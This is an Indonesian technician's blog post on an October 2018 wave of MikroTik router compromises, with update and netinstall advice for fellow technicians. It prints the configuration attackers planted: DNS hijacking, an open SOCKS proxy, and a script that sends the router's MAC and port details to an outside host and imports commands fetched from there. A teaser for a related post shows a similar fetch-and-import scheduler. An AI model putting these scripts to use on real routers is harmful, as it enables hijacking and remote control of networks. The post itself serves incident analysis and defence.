Langsung ke konten utama

Mikrotik : Wabah Oktober 2018

email : ariyaandro@gmail.com

mimin lagi mimisan sekarang mendapat serangan bertubi-tubi soal bug mikrotik ini. sekali lagi ini bug yang dimanfaatkan menjadi tool lalu dimasifkan ke seluruh mikrotik secara bot. sehingga banyak penyesangan pada router mikrotik hingga beberapa bulan trakhir ini. dari postingan hajime hingga sekarang menemui sekitar 3 macam medode serangan termasuk sekarang.

post yang lalu yaitu :

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia

Mikrotik : Wabah september 2018

berikut capture serangan yang terjadi

ini baru sempat ngoprek config mana saja yang di sasar,.. berikut hasilnya :

/ip firewall connection trackingset enabled=yes/ip dnsset servers=199.168.99.27,199.168.99.28/ip firewall filteradd action=drop chain=input comment="drop ftp brute forcers" dst-port=21 \protocol=tcp src-address-list=ftp_blacklistadd action=reject chain=output dst-address=139.99.5.202 protocol=tcpadd action=reject chain=output dst-address=95.154.216.166 protocol=tcpadd action=accept chain=input dst-port=6797 protocol=tcpadd action=accept chain=output content="530 Login incorrect" dst-limit=\1/1m,9,dst-address/1m protocol=tcpadd action=add-dst-to-address-list address-list=ftp_blacklist \address-list-timeout=3h chain=output content="530 Login incorrect" \protocol=tcp/ip serviceset telnet disabled=yesset ftp disabled=yesset www port=8081set ssh port=22515set api disabled=yesset winbox disabled=yesset api-ssl disabled=yes/ip socksset enabled=yes max-connections=500 port=6797/ip socks accessadd src-address=5.188.0.0/15add src-address=192.243.0.0/16add src-address=5.9.0.0/16add src-address=5.104.0.0/16add action=deny src-address=0.0.0.0/0

ada serangan juga membuat seding mac address WAN seperti berikut

hacked-sending_mac

 

add dont-require-permissions=no name=iDDNS owner=admin policy=\ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\\_mac [/interface ethernet get 1 mac-address]\r\\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\\"_\".[/ip proxy get port])\r\\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\\".[/interface pptp-server server get enabled])\r\\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\\n/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dns;:de\lay 3s\r\\n/import dns;:delay 4s;/file remove dns"

dan jika diperhatikan kembali ada user login baru pada PPP yang menyasar password dengan mac address…

coba lakukan update os mikrotik, walau di update nya tidak ada penjelasan spesifik pembenahan bug soal hacked beberapa bulan terakhir ini. jadi disambi closing port atau service yang ada pada router diperlukan. ketika posting ini ada, masih mencapai update os 18 sept 2018 saja

bila ada kesulitan update seperti biasanya, maka perlu di coba format ulang router dengan netinstall. bila resiko netinstall ggal maka router tak akan bisa booting, maka sediakan mikrotik cadangan seperlkunya.

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Mikrotik : Wabah November 2018

email : ariyaandro@ gmail.com post yang lalu yaitu : Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia Mikrotik : Wabah september 2018 Mikrotik : Wabah Oktober 2018 update temuan script hacked yang baru lagi,…   /system scheduler add interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\ han. pythonanywhere.com /\" dst-path=tmp} on-error={:put \"get http error\"}\ ;\r\ \n/import tmp;\r\ \n/file remove tmp;" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\ mar/31/2018 start-time=20:21:00 /system script add name=script4_ owner=xxx policy=\ ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\ ddress= 95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\ lt=no"   /ip dns set allow-remote-requests=yes servers=" 94.247.43.254,1\ 07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141 " /ip firewall nat add action=redirect chain=dstnat comme...
Posting Komentar
Read more »

Troubleshoot : Cek dan Menurunkan Beban CPU Mikrotik karena SPI Service

email : ariyaandro@gmail.com POSTING 813 kapan lalu mimin mengalami kendala jaringan yang sedikit melemah dan ternyata ada gangguan load CPU pada mikrotik seri 2011UiAS-2HnD, lanjut gunakan tutorial berikut untuk menemukan dugaan yang ada Cara Mengetahui Proses yang Menyebabkan CPU Usage Tinggi di Mikrotik akhirnya terpantau CPU tinggi walau kondisi idle di luar jam kerja di beberapa minggu trakhir dengan rerata CPU load hampir 50 %, pertama untuk meastikan disable atau hapus rule yang tak terlalu wajib utk sementara. namun kendala CPU load cukup tinggi, dugaan rentang sekitar 2 minggu trakhir ada update OS itu yang mengakibatkan ada bug yang berimbas ke service SPI. dikarenakan router yang sama di lokasi berbeda dengan OS update yang sama dengan rule yang hampir sama jumlah aktifnya tidak mengalami load cukup tinggi. Cara Memperkecil Load CPU Mikrotik hasil pengecekan tool-profile ternyata service SPI yang sedang bermasalah memakan resource cukup tinggi dan merepotkan traffic jaringan...
Posting Komentar
Read more »

Troubleshoot : intel management engine interface - shutdown problem - can't power off

email : ariyaandro@gmail.com POSTING 797 beberapa waktu lalu mimin ada sedikit problem yang menggangu yaitu ketika PC melakukan proses shutdown selesai, power PC tidak bisa langsung off sempurna (diakhir proses shutdown hanya dim warna hitam saja pada layar) harus dimatikan paksa. namun dengan solusi berikut syukurlah membantu kembali lancar shutdown dengan baik. spek yang sedang digunakan PC yang problem ini yaitu menggunakan Windows 10 Pro 64 bit. setelah mencari artikel yang sesuai berikut https://forums.tomshardware.com/faq/fix-intel-registered-management-engine-interface-has-a-driver-problem.3274586/ https://tencomputer.com/intel-management-engine-interface-driver/ https://www.drivereasy.com/knowledge/intel-r-management-engine-interface-this-device-cannot-start-on-windows-solved/ https://community.spiceworks.com/topic/2095008-remove-intel-management-engine kesimpulan , ada kemungkinan masalah driver yaitu intel management engine interface. maka dilakukan rekomendasi uninstall driv...
Posting Komentar
Read more »